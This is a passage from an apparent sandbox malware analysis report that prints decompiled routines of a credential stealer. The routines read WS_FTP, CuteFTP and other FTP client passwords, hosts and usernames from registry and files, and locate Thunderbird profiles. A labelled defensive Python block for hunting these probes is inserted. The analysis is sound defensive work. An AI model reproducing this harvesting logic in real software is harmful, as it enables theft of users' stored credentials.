                                                                                                                                        • API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
                                                                                                                                        • String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
                                                                                                                                        • API String ID: 2508676433-45949541
                                                                                                                                        • Opcode ID: eb97cd1f0e2c986a26f8acf9b2e6d8739f3ccb22311936a2a995d4dd87c5fb63
                                                                                                                                        • Instruction ID: 9fc757f722d9e5c4d1f63979fcce86b5e771d899d87070f8cfc3463daa125b20
                                                                                                                                        • Opcode Fuzzy Hash: eb97cd1f0e2c986a26f8acf9b2e6d8739f3ccb22311936a2a995d4dd87c5fb63
                                                                                                                                        • Instruction Fuzzy Hash: 492153B9A40109BEFF11EB60CC43FED7668EB143C0F010065B748F44AAEFB1AB909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                        			E10004FD4(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char* _t30;
                                                                                                                                        				void* _t37;
                                                                                                                                        				void* _t38;
                                                                                                                                        				void* _t39;
                                                                                                                                        				char* _t40;
                                                                                                                                        
                                                                                                                                        				_t39 = __edx;
                                                                                                                                        				_t38 = __ecx;
                                                                                                                                        				_t37 = __ebx;
                                                                                                                                        				_v8 = E100015A9(_a4, 4, 0);
                                                                                                                                        				_t40 =  *0x1000f0dd; // 0x2874ff8
                                                                                                                                        				if( *_t40 == 0) {
                                                                                                                                        					L5:
                                                                                                                                        					E10004F2B(_t38, _t44, _a4, 0x1a); // executed
                                                                                                                                        					E10004F2B(_t38, _t44, _a4, 0x23); // executed
                                                                                                                                        					E10004F2B(_t38, _t44, _a4, 0x1c); // executed
                                                                                                                                        					E10004F2B(_t38, _t44, _a4, 0x26); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
                                                                                                                                        					E10004DAA(_a4, "Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"); // executed
                                                                                                                                        					return E100015EF(_t37, _t38, _t39, _t44, _a4, _v8);
                                                                                                                                        				} else {
                                                                                                                                        					goto L1;
                                                                                                                                        				}
                                                                                                                                        				do {
                                                                                                                                        					L1:
                                                                                                                                        					_t30 = StrStrIA(_t40, "CUTEFTP");
                                                                                                                                        					_t42 = _t30;
                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                        						_t34 = E100023E6(_t42, _t40);
                                                                                                                                        						if(E100023E6(_t42, _t40) != 0) {
                                                                                                                                        							E10004DF4(_t38, _a4, _t34, "\\sm.dat");
                                                                                                                                        							E10001871(_t34);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					asm("cld");
                                                                                                                                        					_t38 = 0xffffffff;
                                                                                                                                        					asm("repne scasb");
                                                                                                                                        					_t44 =  *_t40;
                                                                                                                                        				} while ( *_t40 != 0);
                                                                                                                                        				goto L5;
                                                                                                                                        			}
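                                                                                                                                         Added example (not code from the sample, from Joe Sandbox, or from this report's author): the two decompiled routines above enumerate where WS_FTP and CuteFTP keep their data, so a defender wants the same list as hunt paths and a way to flag these probes in an API trace. The block below does both. It assumes the constants 0x1a, 0x1c, 0x23, 0x26 and 0x2b handed to E10001E6A, E10004C10 and E10004F2B are CSIDL folder IDs resolved via SHGetFolderPath (the documented values are CSIDL_APPDATA, CSIDL_LOCAL_APPDATA, CSIDL_COMMON_APPDATA, CSIDL_PROGRAM_FILES and CSIDL_PROGRAM_FILES_COMMON; the resolution itself is not visible on the page), that the NUL-separated list the `repne scasb` loop walks holds directory names, and it constructs its own sample list and trace (the trace lines are copied from the API tables here, plus one made-up RegOpenKeyExA line marked as such).

```python
import re

# Documented CSIDL values for the constants the decompiled helpers receive:
# E10001E6A(0x2b), E10004C10(.., 0x1a/0x23/0x1c, ..), E10004F2B(.., 0x26).
# That they are resolved with SHGetFolderPath is an assumption suggested by
# the "\Ipswitch\WS_FTP" suffix appended to the result.
CSIDL_ENV = {
    0x1a: "%APPDATA%",             # CSIDL_APPDATA
    0x1c: "%LOCALAPPDATA%",        # CSIDL_LOCAL_APPDATA
    0x23: "%ProgramData%",         # CSIDL_COMMON_APPDATA
    0x26: "%ProgramFiles%",        # CSIDL_PROGRAM_FILES
    0x2b: "%CommonProgramFiles%",  # CSIDL_PROGRAM_FILES_COMMON
}

# The seven CuteFTP keys E10004FD4 passes to E10004DAA, verbatim from the report.
CUTEFTP_REGISTRY_KEYS = [
    r"Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar",
    r"Software\GlobalSCAPE\CuteFTP 9\QCToolbar",
]

def wsftp_probe_paths():
    """Locations E10004C5C tries for WS_FTP data, in the order it tries them."""
    probes = [
        (r"%WINDIR%\win.ini", "[WS_FTP] DIR"),
        (r"%WINDIR%\win.ini", "[WS_FTP] DEFDIR"),
        (CSIDL_ENV[0x2b] + r"\Ipswitch\WS_FTP", "directory"),
    ]
    for csidl in (0x1a, 0x23, 0x1c):
        probes.append((CSIDL_ENV[csidl] + r"\Ipswitch", "directory"))
    return probes

def walk_string_list(buf):
    """Entries of a NUL-separated, double-NUL-terminated list: the layout the
    `repne scasb` loop in E10004FD4 advances through one string at a time."""
    off = 0
    while off < len(buf) and buf[off] != 0:
        end = buf.index(b"\x00", off)
        yield buf[off:end].decode("latin-1")
        off = end + 1

def cuteftp_candidates(buf):
    """sm.dat paths the CUTEFTP search would yield. Assumes entries are
    directories; the page does not show what E100023E6 derives from a hit."""
    return [s + r"\sm.dat" for s in walk_string_list(buf) if "cuteftp" in s.lower()]

# Parser for the "Api.Module(args), ref: addr" lines of the API tables above.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

def parse_api_line(line):
    m = LINE_RE.match(line)
    if m is None:
        return None
    return m.group("api"), m.group("mod"), m.group("args").split(","), int(m.group("ref"), 16)

def classify(api, args):
    """Name the credential store a call targets, or None if it is unrelated."""
    if api == "GetPrivateProfileStringA" and len(args) > 1 and args[0] == "WS_FTP":
        return ("WS_FTP", "win.ini [WS_FTP] " + args[1])
    if api == "StrStrIA" and len(args) > 1 and args[1].upper() == "CUTEFTP":
        return ("CuteFTP", "install located by case-insensitive name search")
    if api.startswith("Reg"):
        for a in args:
            if "GlobalSCAPE" in a:
                return ("CuteFTP", a)
    return None

def scan_trace(text):
    """(ref, api, family, detail) for every credential-store probe in a trace."""
    findings = []
    for line in text.splitlines():
        parsed = parse_api_line(line)
        if parsed is None:
            continue
        api, _mod, args, ref = parsed
        hit = classify(api, args)
        if hit is not None:
            findings.append((hex(ref), api) + hit)
    return findings

# Constructed list (not from the report) with one CuteFTP entry.
SAMPLE_LIST = (b"C:\\Program Files\\GlobalSCAPE\\CuteFTP 8 Home\x00"
               b"C:\\Program Files\\WinRAR\x00\x00")

# Lines copied from this report's API tables, plus one constructed registry
# line (ref 00000000, not from the report) to exercise the GlobalSCAPE rule.
SAMPLE_TRACE = r"""
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 10004C80
GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,1000F137,?,00000104,?), ref: 10004CD0
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,1000F137,?,00000104,?), ref: 10004D0B
StrStrIA.SHLWAPI(02874FF8,CUTEFTP), ref: 10004FFB
RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 100026D1
RegOpenKeyExA.ADVAPI32(80000001,Software\GlobalSCAPE\CuteFTP 9\QCToolbar,00000000,00020019,?), ref: 00000000
"""
```

The WinRAR RegCreateKeyA line from the first function is deliberately left unflagged: on this page it sits next to a temp-file create/delete pair rather than a credential read, so treating every Software\\ key as a theft indicator would be a false positive. On a live host the entries from wsftp_probe_paths() and CUTEFTP_REGISTRY_KEYS are what to audit for reads by a process that is not the FTP client itself.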

                                                                                                                                         Instruction addresses (one per C-code line; 0x00000000 marks lines with no code): 0x10004fd4 0x10004fd4 0x10004fd4 0x10004fe7 0x10004fea 0x10004ff3 0x10005030 0x10005035 0x1000503f 0x10005049 0x10005053 0x10005060 0x1000506d 0x1000507a 0x10005087 0x10005094 0x100050a1 0x100050ae 0x100050c0 0x00000000 0x00000000 0x00000000 0x10004ff5 0x10004ff5 0x10004ffb 0x10005000 0x10005002 0x1000500a 0x1000500c 0x10005018 0x1000501d 0x1000501d 0x1000500c 0x10005022 0x10005025 0x1000502a 0x1000502c 0x1000502c 0x00000000

                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(02874FF8,CUTEFTP), ref: 10004FFB
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(?), ref: 100023FA
                                                                                                                                          • Part of subcall function 100023E6: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
                                                                                                                                          • Part of subcall function 100023E6: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
                                                                                                                                          • Part of subcall function 100023E6: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 10005058
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 9\QCToolbar, xrefs: 100050A6
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 1000508C
                                                                                                                                        • CUTEFTP, xrefs: 10004FF5
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 10005065
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 10005072
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 10005099
                                                                                                                                        • \sm.dat, xrefs: 1000500F
                                                                                                                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 1000507F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FreeLocal
                                                                                                                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 9\QCToolbar$\sm.dat
                                                                                                                                        • API String ID: 1884169789-3073816274
                                                                                                                                        • Opcode ID: 6da64f6cf6c457a75d471d870fd20c73a0ee07e41b0f42b061a23daa4fce9d40
                                                                                                                                        • Instruction ID: 7fdc5397d1ef8ffd5e520bfd625dd7bb200c026372fa9f09274203f99b29d196
                                                                                                                                        • Opcode Fuzzy Hash: 6da64f6cf6c457a75d471d870fd20c73a0ee07e41b0f42b061a23daa4fce9d40
                                                                                                                                        • Instruction Fuzzy Hash: 482172B8104505BAFF51EF60CC02EAE3E65EF153C1F014125B909780BFDF71AA61EA45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.42%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10005A20(intOrPtr _a4, char* _a8) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				char _v2064;
                                                                                                                                        				intOrPtr _v2068;
                                                                                                                                        				intOrPtr _v2072;
                                                                                                                                        				intOrPtr _v2076;
                                                                                                                                        				intOrPtr _v2080;
                                                                                                                                        				intOrPtr _v2084;
                                                                                                                                        				intOrPtr _v2088;
                                                                                                                                        				intOrPtr* _v2092;
                                                                                                                                        				char _v2096;
                                                                                                                                        				char _v2100;
                                                                                                                                        				long _t57;
                                                                                                                                        				long _t58;
                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                        
                                                                                                                                        				_t57 = RegOpenKeyA( *0x1000f159, _a8,  &_v8); // executed
                                                                                                                                        				_t58 = _t57;
                                                                                                                                        				if(_t58 == 0) {
                                                                                                                                        					_v12 = 0;
                                                                                                                                        					while(1) {
                                                                                                                                        						_v16 = 0x7ff;
                                                                                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						_v2068 = E10001E05(E10001DB1(_a8, "\\"),  &_v2064);
                                                                                                                                        						_v2080 = E10001D2A( *0x1000f159, _v2068, "PW", 0);
                                                                                                                                        						_v2072 = E10001D2A( *0x1000f159, _v2068, "Host", 0);
                                                                                                                                        						_v2076 = E10001D2A( *0x1000f159, _v2068, "User", 0);
                                                                                                                                        						_v2084 = E10001D2A( *0x1000f159, _v2068, "PthR", 0);
                                                                                                                                        						_t72 = E10001D2A( *0x1000f159, _v2068, "Port",  &_v2096);
                                                                                                                                        						if(_t72 == 0 || _v2096 != 4) {
                                                                                                                                        							_t73 = _t72;
                                                                                                                                        							if(_t72 != 0) {
                                                                                                                                        								E10001871(_t73);
                                                                                                                                        							}
                                                                                                                                        							_v2088 = 0x15;
                                                                                                                                        						} else {
                                                                                                                                        							 *_t23 =  *_t72;
                                                                                                                                        							E10001871(_t72);
                                                                                                                                        						}
                                                                                                                                        						_v2092 = E10001D2A( *0x1000f159, _v2068, "SSH",  &_v2100);
                                                                                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                                                                                        							E10001522(_a4, 0xbeef0010);
                                                                                                                                        							E10001584(_a4, _v2072);
                                                                                                                                        							E10001584(_a4, _v2076);
                                                                                                                                        							E10001584(_a4, _v2080);
                                                                                                                                        							E10001522(_a4, _v2088);
                                                                                                                                        							E10001584(_a4, _v2084);
                                                                                                                                        							if(_v2092 == 0 || _v2100 != 4) {
                                                                                                                                        								E10001522(_a4, 0);
                                                                                                                                        							} else {
                                                                                                                                        								E10001522(_a4,  *_v2092);
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						E10001871(_v2080);
                                                                                                                                        						E10001871(_v2072);
                                                                                                                                        						E10001871(_v2076);
                                                                                                                                        						E10001871(_v2084);
                                                                                                                                        						E10001871(_v2092);
                                                                                                                                        						E10001871(_v2068);
                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                        					}
                                                                                                                                        					return RegCloseKey(_v8);
                                                                                                                                        				}
                                                                                                                                        				return _t58;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 10005A36
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10005A6A
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 10005C78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: Host$Port$PthR$SSH$User
                                                                                                                                        • API String ID: 1332880857-1643752846
                                                                                                                                        • Opcode ID: ca9a7a4c7330c150e1eabc2d28caf2c9fdcfafb3968b0b5e5b29e96d8aaaaa8a
                                                                                                                                        • Instruction ID: c14ecc450117f64a99103eb1540e63d5e0307dc6e70b8a7d01c738e33745f537
                                                                                                                                        • Opcode Fuzzy Hash: ca9a7a4c7330c150e1eabc2d28caf2c9fdcfafb3968b0b5e5b29e96d8aaaaa8a
                                                                                                                                        • Instruction Fuzzy Hash: 3351063590051CEAEF21AB60CC45BEDBBB9FF04781F10C0A5F54865469DF72AE91AF81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E10007515(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                        				CHAR* _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				CHAR* _v20;
                                                                                                                                        				void* _t32;
                                                                                                                                        				void* _t33;
                                                                                                                                        				void* _t34;
                                                                                                                                        				void* _t35;
                                                                                                                                        				intOrPtr _t38;
                                                                                                                                        				CHAR* _t40;
                                                                                                                                        				void* _t42;
                                                                                                                                        				void* _t48;
                                                                                                                                        				long _t49;
                                                                                                                                        				long _t53;
                                                                                                                                        				int _t55;
                                                                                                                                        				char* _t57;
                                                                                                                                        				char* _t61;
                                                                                                                                        				char* _t62;
                                                                                                                                        				CHAR* _t63;
                                                                                                                                        
                                                                                                                                        				_t32 = E10001F38(_a8); // executed
                                                                                                                                        				_t33 = _t32;
                                                                                                                                        				if(_t33 != 0) {
                                                                                                                                        					_t34 = E10001F38(_a12); // executed
                                                                                                                                        					_t35 = _t34;
                                                                                                                                        					if(_t35 != 0) {
                                                                                                                                        						if(E10002582(_a8) != 0) {
                                                                                                                                        							_t38 = E10001DB1(_a8, 0);
                                                                                                                                        						} else {
                                                                                                                                        							_t38 = E10001DB1(_a8, "\\");
                                                                                                                                        						}
                                                                                                                                        						_v16 = _t38;
                                                                                                                                        						_v12 = E10001DB1(_v16, "profiles.ini");
                                                                                                                                        						_t40 = E10001888(0xfdea); // executed
                                                                                                                                        						_v8 = _t40;
                                                                                                                                        						_v20 = E10001888(0x1000);
                                                                                                                                        						_t42 = E10001EEF(_v12); // executed
                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                        							_t49 = GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12); // executed
                                                                                                                                        							if(_t49 > 2) {
                                                                                                                                        								_t63 = _v8;
                                                                                                                                        								if( *_t63 != 0) {
                                                                                                                                        									do {
                                                                                                                                        										if(StrStrIA(_t63, "Profile") != 0) {
                                                                                                                                        											_t53 = GetPrivateProfileStringA(_t63, "Path", 0x1000f137, _v20, 0xfff, _v12); // executed
                                                                                                                                        											if(_t53 != 0) {
                                                                                                                                        												_t55 = GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12); // executed
                                                                                                                                        												if(_t55 != 1) {
                                                                                                                                        													E100074FD(_a4, _v20, _a12);
                                                                                                                                        												} else {
                                                                                                                                        													_t57 = E10001DB1(_v16, _v20);
                                                                                                                                        													_push(_t57);
                                                                                                                                        													_t61 = _t57;
                                                                                                                                        													while(1) {
                                                                                                                                        														_t62 = _t61;
                                                                                                                                        														if(_t62 == 0 ||  *_t62 == 0) {
                                                                                                                                        															break;
                                                                                                                                        														}
                                                                                                                                        														if( *_t62 == 0x2f) {
                                                                                                                                        															 *_t62 = 0x5c;
                                                                                                                                        														}
                                                                                                                                        														_t61 = _t62 + 1;
                                                                                                                                        													}
                                                                                                                                        													E100074FD(_a4, _t57, _a12); // executed
                                                                                                                                        													E10001871();
                                                                                                                                        												}
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        										asm("cld");
                                                                                                                                        										asm("repne scasb");
                                                                                                                                        									} while ( *_t63 != 0);
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						E10001871(_v16);
                                                                                                                                        						E10001871(_v20);
                                                                                                                                        						E10001871(_v12);
                                                                                                                                        						E10001871(_v8); // executed
                                                                                                                                        						_t48 = E100074FD(_a4, _a8, _a12); // executed
                                                                                                                                        						return _t48;
                                                                                                                                        					} else {
                                                                                                                                        						return _t35;
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					return _t33;
                                                                                                                                        				}
                                                                                                                                        			}

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                        • API String ID: 0-4107377610
                                                                                                                                        • Opcode ID: 81c0fd32d6717f921d573a250075c8a8f3e788a2228be87d5054b32b657cd280
                                                                                                                                        • Instruction ID: 85f9e47206b8348aed535847340b693f762fa8b9e309845cd9064b8e993d129c
                                                                                                                                        • Opcode Fuzzy Hash: 81c0fd32d6717f921d573a250075c8a8f3e788a2228be87d5054b32b657cd280
                                                                                                                                        • Instruction Fuzzy Hash: F1417175E04946BAFF12DFA4DC02EED7FB2FF012C0F148161F525640AADB7A9A51AB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E10003B95(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
                                                                                                                                        				char* _v8;
                                                                                                                                        				int _v12;
                                                                                                                                        				char*** _v16;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __ebp;
                                                                                                                                        				void* _t39;
                                                                                                                                        				char* _t47;
                                                                                                                                        				char* _t48;
                                                                                                                                        				char* _t49;
                                                                                                                                        				char* _t50;
                                                                                                                                        				void* _t52;
                                                                                                                                        				void* _t54;
                                                                                                                                        				void* _t66;
                                                                                                                                        				char* _t82;
                                                                                                                                        				char* _t83;
                                                                                                                                        				void* _t84;
                                                                                                                                        				char* _t87;
                                                                                                                                        				char* _t88;
                                                                                                                                        				void* _t89;
                                                                                                                                        
                                                                                                                                        				_t73 = __edx;
                                                                                                                                        				_v8 = E10001888(0x7d00);
                                                                                                                                        				E10001000( &_v16, __ecx, __edx,  &_v16);
                                                                                                                                        				_t66 = 0;
                                                                                                                                        				while(1) {
                                                                                                                                        					_t39 = E10003A4D(_a4, _v16, 0xfa00, 0xa); // executed
                                                                                                                                        					if(_t39 == 0 || E10001091(_t39, _t66, _t73, _v16) > 0xfa00) {
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					if(E10003B47(_t73, _v16) == 0) {
                                                                                                                                        						continue;
                                                                                                                                        					}
                                                                                                                                        					E100012E8(_t44, _t73, _v16);
                                                                                                                                        					_t77 =  *_v16;
                                                                                                                                        					( *_v16)[3](_v16, _v8, 0x2134, 0);
                                                                                                                                        					_v12 = 0;
                                                                                                                                        					_t47 = StrStrIA(_v8, "Content-Length:");
                                                                                                                                        					_push(_t66);
                                                                                                                                        					_t48 = _t47;
                                                                                                                                        					if(_t48 != 0) {
                                                                                                                                        						_t87 =  &(_t48[lstrlenA("Content-Length:")]);
                                                                                                                                        						_push(_t87);
                                                                                                                                        						_t88 =  &(_t87[1]);
                                                                                                                                        						asm("repne scasb");
                                                                                                                                        						 *((char*)(_t88 - 1)) = 0;
                                                                                                                                        						_v12 = StrToIntA(_t88);
                                                                                                                                        						_t89 = _t88;
                                                                                                                                        						 *((char*)(_t89 - 1)) = 0xd;
                                                                                                                                        					}
                                                                                                                                        					_pop(_t67);
                                                                                                                                        					_t49 = StrStrIA(_v8, "Location:");
                                                                                                                                        					_t50 = _t49;
                                                                                                                                        					if(_t50 != 0) {
                                                                                                                                        						_t82 =  &(_t50[lstrlenA("Location:")]);
                                                                                                                                        						_push(_t82);
                                                                                                                                        						_t83 =  &(_t82[1]);
                                                                                                                                        						asm("repne scasb");
                                                                                                                                        						 *((char*)(_t83 - 1)) = 0;
                                                                                                                                        						_push(_t83);
                                                                                                                                        						_t50 = E100029F6(_t83);
                                                                                                                                        						_t77 = _a12;
                                                                                                                                        						if(_t77 == 0) {
                                                                                                                                        							_t50 = E10001871(_t50);
                                                                                                                                        						} else {
                                                                                                                                        							 *_t77 = _t50;
                                                                                                                                        						}
                                                                                                                                        						_pop(_t84);
                                                                                                                                        						 *((char*)(_t84 - 1)) = 0xd;
                                                                                                                                        					}
                                                                                                                                        					_pop(_t66);
                                                                                                                                        					E10001356(_t50, _t77, _v16);
                                                                                                                                        					if(_v12 <= 0) {
                                                                                                                                        						_v12 = 0xa00000;
                                                                                                                                        					}
                                                                                                                                        					_t52 = E10003ABF(_a4, _v16, _v12); // executed
                                                                                                                                        					_t54 = E10001091(_t52, _t66, _t77, _v16);
                                                                                                                                        					if(_t54 != 0) {
                                                                                                                                        						if(_t54 != 0) {
                                                                                                                                        							_push(_a8);
                                                                                                                                        							_push(_v16);
                                                                                                                                        							if(( *_v16)[0xd]() >= 0) {
                                                                                                                                        								_t66 = 1;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					break;
                                                                                                                                        				}
                                                                                                                                        				( *_v16)[2](_v16);
                                                                                                                                        				E10001871(_v8);
                                                                                                                                        				return _t66;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 10003C1B
                                                                                                                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 10003C2C
                                                                                                                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 10003C4D
                                                                                                                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 10003C64
                                                                                                                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 10003C75
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocLocal
                                                                                                                                        • String ID: Content-Length:$Location:
                                                                                                                                        • API String ID: 2140729754-2400408565
                                                                                                                                        • Opcode ID: ae2eff76657db54955c8ca96dc74d28d1043526168dc1cc857f9fcbc112df143
                                                                                                                                        • Instruction ID: 2a7beda4beeaf4579a8e03f3651bf29a53b37e5b3a39614d2f1fc213eebf3131
                                                                                                                                        • Opcode Fuzzy Hash: ae2eff76657db54955c8ca96dc74d28d1043526168dc1cc857f9fcbc112df143
                                                                                                                                        • Instruction Fuzzy Hash: E2419E39A04109BBFB02CBA4CC42FDEFBAAEF413C4F208175F510A6169DB75AA519710
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000AE2D(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char _v269;
                                                                                                                                        				void* _t28;
                                                                                                                                        				void* _t29;
                                                                                                                                        				void* _t30;
                                                                                                                                        
                                                                                                                                        				_t30 = __eflags;
                                                                                                                                        				_t29 = __edx;
                                                                                                                                        				_t28 = __ecx;
                                                                                                                                        				_v8 = E100015A9(_a4, 0x5f, 0);
                                                                                                                                        				 *0x10010155 = 2;
                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                                                                                        				E10007690(_t28, _a4,  *0x1000f159, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                                                                                        				E10007690(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
                                                                                                                                        				SetCurrentDirectoryA( &_v269);
                                                                                                                                        				 *0x10010155 = 3;
                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                                                                                        				E10007690(_t28, _a4,  *0x1000f159, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
